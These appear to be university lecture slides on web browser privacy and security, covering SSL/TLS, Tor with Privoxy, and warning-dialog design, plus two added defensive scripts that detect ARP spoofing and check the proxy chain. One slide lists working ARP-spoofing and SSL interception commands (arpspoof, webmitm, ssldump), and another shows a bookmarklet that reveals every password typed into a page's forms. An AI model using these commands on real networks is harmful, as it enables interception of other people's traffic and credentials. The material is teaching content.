Web Browser Privacy and Security
Dhruv Mohindra (MSISPM)
Usable Privacy Security, Spring 08

Agenda
- Web Browsing and 'The User'
- Technology Overview
- Security Concerns
- Privacy Matters
- Recent Developments
- Suggestions

A Model For Informed Consent
Source: Informed Consent by Design (Friedman, Lin, Miller)

Agreement Revisited...

On the other hand...

But with Web Browsers...
None of the approaches work
- One is too intrusive, the other too lax
It is a good idea to reveal simple and required features
- The vast population just wants to browse the Internet
- Expose tutorials and links so that others are satisfied
Hide complexity underneath, advanced users can find it
Strike a trade-off between security and usability
- Recovering Stored Passwords in Firefox

Towards Better Usability...
    javascript:(function () {
        /* Collect the value of every password field in every form on the page. */
        var s, F, j, f, i;
        s = "";
        F = document.forms;
        for (j = 0; j < F.length; ++j) {
            f = F[j];
            for (i = 0; i < f.length; ++i) {
                if (f[i].type.toLowerCase() == "password")
                    s += f[i].value + "\n";
            }
        }
        /* Show what was found in an alert box. */
        if (s)
            alert("Passwords in forms on this page:\n\n" + s);
        else
            alert("There are no passwords in forms on this page.");
    })();

Secure Sockets Layer (SSL/TLS)
• Set of cryptographic protocols that provide secure communications on the Internet, for applications
• Designed to protect from eavesdropping, tampering, replay and packet forgery.
• SSL/TLS implementations do not signify secure “places” but security in 'transit'.
Image Source: http://www.windowsitpro.com

Exercise
How many people feel that they are safe while browsing non TLS(SSL)-enabled websites?
Have you ever questioned someone about how SSL works and how you are safe with it? Or do you take technology for granted because everyone says “Use SSL to browse securely”?

Demonstration

Man-in-the-middle Attack
Source: http://www.acm.org/crossroads/xrds11-1/gfx/figure2-wifi.jpg

Man-in-the-middle Attack
SSL/TLS can be defeated with Social Engineering
Run the following commands (with permission):
- $ arpspoof -t victim gateway
- $ arpspoof -t gateway victim
- $ echo 1 > /proc/sys/net/ipv4/ip_forward
- $ wireshark
- $ webmitm -dd
- $ ssldump -n -d -k webmitm.crt | tee ssldump.log
Where,
victim is the IP address of the victim computer
gateway is the IP address of the gateway
(arpspoof utility comes with the dsniff package)

Anonymous Browsing
What constitutes anonymity on the Internet?
- Hiding the IP address
- Disabling exchange of cookies
- Other personally identifiable information

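
Detection side of the ARP-spoofing step in the man-in-the-middle demonstration above, as an added example that is not part of the original slides: it reads a neighbour table in the format printed by `ip neigh show` and flags a MAC address claimed by more than one IP, and a gateway whose MAC differs from a pinned value. The function names, addresses and pinned MAC are constructed for illustration.

```sh
#!/bin/sh
# Added example: flag signs of ARP spoofing in a neighbour table in the
# format printed by `ip neigh show`. All sample data below is constructed.

# Print the MAC cached for IP $1 (empty if none). stdin = neighbour table.
mac_for_ip() {
    awk -v ip="$1" '$1 == ip {
        for (i = 1; i < NF; i++) if ($i == "lladdr") print tolower($(i + 1))
    }'
}

# Print "MAC ip1,ip2,..." for every MAC claimed by more than one IP.
shared_macs() {
    awk '{
        mac = ""
        for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
        # FAILED/INCOMPLETE rows carry no MAC; skip them and repeated pairs
        if (mac == "" || ((mac, $1) in seen)) next
        seen[mac, $1] = 1
        if (n[mac]++ == 0) ips[mac] = $1; else ips[mac] = ips[mac] "," $1
    }
    END { for (m in n) if (n[m] > 1) print m, ips[m] }'
}

# Succeed only if the gateway ($1) still resolves to its pinned MAC ($2).
gateway_unchanged() {
    pinned=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ "$(mac_for_ip "$1")" = "$pinned" ]
}

# Constructed sample: a victim's cache during spoofing, where the gateway
# 192.0.2.1 and host 192.0.2.66 both answer with the same MAC.
SAMPLE_NEIGH='192.0.2.1 dev eth0 lladdr 02:00:00:00:00:66 REACHABLE
192.0.2.66 dev eth0 lladdr 02:00:00:00:00:66 STALE
192.0.2.20 dev eth0 lladdr 02:00:00:00:00:20 REACHABLE
192.0.2.30 dev eth0 FAILED'

printf '%s\n' "$SAMPLE_NEIGH" | shared_macs
printf '%s\n' "$SAMPLE_NEIGH" | gateway_unchanged 192.0.2.1 02:00:00:00:00:01 ||
    echo "gateway 192.0.2.1 no longer maps to its pinned MAC"
```

On a live host, feed it `ip neigh show | shared_macs`. A shared MAC can also be legitimate (a router holding several addresses), so treat a hit as a reason to check the gateway entry against its pinned value.
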
TOR (The Onion Router)
- Routes traffic through three mix proxies by default
- The sender encrypts a message thrice
- Due to layered encryption, it is called Onion Routing
- You are safer as long as people in your anonymity set are non-identifiable
- TOR is a SOCKS proxy and thus requires Privoxy
- Privoxy handles http, https data and DNS lookups then passes traffic to TOR via a SOCKS connection

TOR Caveats
False sense of completion
- Sometimes users mistakenly feel protected while they are not
Using TOR without Privoxy
- Configuring a browser to use TOR as its SOCKS proxy doesn't work due to DNS lookups/leaks
Execution of Client-side code
- Enabling Java, Javascript, Flash or ActiveX is very dangerous.
At first glance the whole system is difficult to grasp
- No clear description of how tor, Vidalia, Privoxy work
- No clear message that Privoxy is to run on port 8118 while TOR on 9050 (useful when configuring browser)

FoxTor on Linux
TOR, Privoxy and FoxTor installed gracefully
- Compiled source packages as usual and installed the Firefox extension using the web browser.
Configuration of Privoxy was tricky
- “forward-socks4a / 127.0.0.1:9050 .”, line had to be added in /etc/privoxy/config. Not mentioned in docs.
- It would be nice to have FoxTor's 'help' have these descriptions
Runtime Issues
- FoxTor continues to say “You are now Masked” even when one has turned off either Privoxy or tor.
- The user may not realize the real source of the problem and may try fiddling with FoxTor instead

Recent Developments
Context Sensitive Certificate Verification
- Clarify relationship between user and server
- Uses tokens and modifies web browsers
- Displays a series of alert boxes...complicated?
- Do you have information on removable media?
- Are you an internal member of the Org. that owns the server?
- Doesn't help avoid dangers with public websites
- Denial of Service
Specific Password Warnings
- Alert user while sending unencrypted passwords
- Series of confirmation windows again...
- User Study participants are more careful when you tell them “Do not visit websites you consider too risky”

Context Sensitive Dialog Boxes
- Conveys the initial meaning without any verbose statements
- Tailor according to skill set of user, ask at browser installation time
- Change images while adapting to user's daily usage and preferences

Context Sensitive Dialog Boxes
- Convey application or website specific risk
- More intuitive and easy to understand
- Users can click 'x' to dismiss anytime
- 'Learn More' is default, curious users will click at first instinct

Conclusion

Questions
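
For the runtime issue on the 'FoxTor on Linux' slide (the extension reporting “You are now Masked” with Privoxy or tor stopped), an added example that is not part of the original slides or of FoxTor: a shell check of each link in the chain, using the ports and the forward line given on the slides. The function names are hypothetical, and a netcat that supports `-z` is assumed.

```sh
#!/bin/sh
# Added example: verify the browser -> Privoxy -> tor chain before trusting a
# "masked" indicator. Ports and the forward line are the ones on the slides.

# Succeed if the Privoxy config ($1) has an active (uncommented) forward line.
privoxy_forwards_to_tor() {
    awk '$1 == "forward-socks4a" && $2 == "/" && $3 == "127.0.0.1:9050" && $4 == "." { ok = 1 }
         END { exit !ok }' "$1"
}

# Succeed if something accepts TCP connections on host $1, port $2.
# Assumption: a netcat that supports -z (connect without sending data).
port_open() {
    nc -z -w 2 "$1" "$2" >/dev/null 2>&1
}

# Report the first broken link; succeed only when all three checks pass.
chain_status() {
    if ! privoxy_forwards_to_tor "$1"; then
        echo "NOT MASKED: no active forward-socks4a line in config"; return 1
    elif ! port_open 127.0.0.1 8118; then
        echo "NOT MASKED: Privoxy is not listening on 8118"; return 1
    elif ! port_open 127.0.0.1 9050; then
        echo "NOT MASKED: tor is not listening on 9050"; return 1
    fi
    echo "chain up: Privoxy:8118 -> tor:9050"
}

# Constructed sample config; on a real system pass /etc/privoxy/config.
cfg=$(mktemp)
printf '%s\n' 'listen-address 127.0.0.1:8118' \
              'forward-socks4a / 127.0.0.1:9050 .' > "$cfg"
chain_status "$cfg" || true
rm -f "$cfg"
```

A passing result shows only that both daemons are listening and Privoxy is configured to forward to tor; the client-side code caveats from the 'TOR Caveats' slide still apply.
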